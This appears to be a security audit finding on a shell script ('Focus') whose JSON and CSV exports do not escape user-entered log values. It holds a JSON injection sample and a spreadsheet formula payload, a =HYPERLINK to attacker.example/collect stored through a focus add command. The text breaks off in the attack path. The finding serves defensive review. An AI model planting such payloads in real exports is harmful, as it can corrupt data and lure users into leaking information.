T09 · Insecure Skill Coding Practices
- Location
scripts/script.sh:68- Finding
Unescaped User Input in JSON and CSV Exports
- Content
View full analysis
> "$out" done < "$f" done echo "\n]" >> "$out" ;; csv) echo "type,time,value" > "$out" for f in "$DATA_DIR"/*.log; do [ -f "$f" ] || continue local name=$(basename "$f" .log) while IFS='|' read -r ts val; do echo "$name,$ts,$val" >> "$out"; done < "$f" ``` ### Technical Analysis The export implementation directly interpolates log data into JSON and CSV output without applying the escaping rules required by either format. The `val` variable originates from user-controlled entry text stored by commands such as `focus add`, `focus plan`, and `focus track`. For JSON output, quotation marks, backslashes, control characters, and embedded newlines are not JSON-escaped. A value such as: ```text "} , {"type":"injected","time":"attacker","value":"record ``` can terminate the intended value and inject additional JSON structure or render the exported document invalid. For CSV output, fields are not enclosed in quotes and embedded quotes, commas, carriage returns, and newlines are not escaped. This permits record and column injection. Additionally, a value beginning with `=`, `+`, `-`, or `@` may be interpreted as a formula when the CSV file is opened in spreadsheet software. The exact behavior and available capabilities depend on the spreadsheet application's security settings. This issue does not cause shell command execution inside the Focus script itself. Exploitation requires a downstream parser, application, or user to consume the generated export. ### Attack Path 1. An attacker supplies or convinces a user to store a crafted entry, for example: ```bash focus add '=HYPERLINK("https://attacker.example/collect","Open report ...[truncated 1453 chars]- Remediation
View remediation
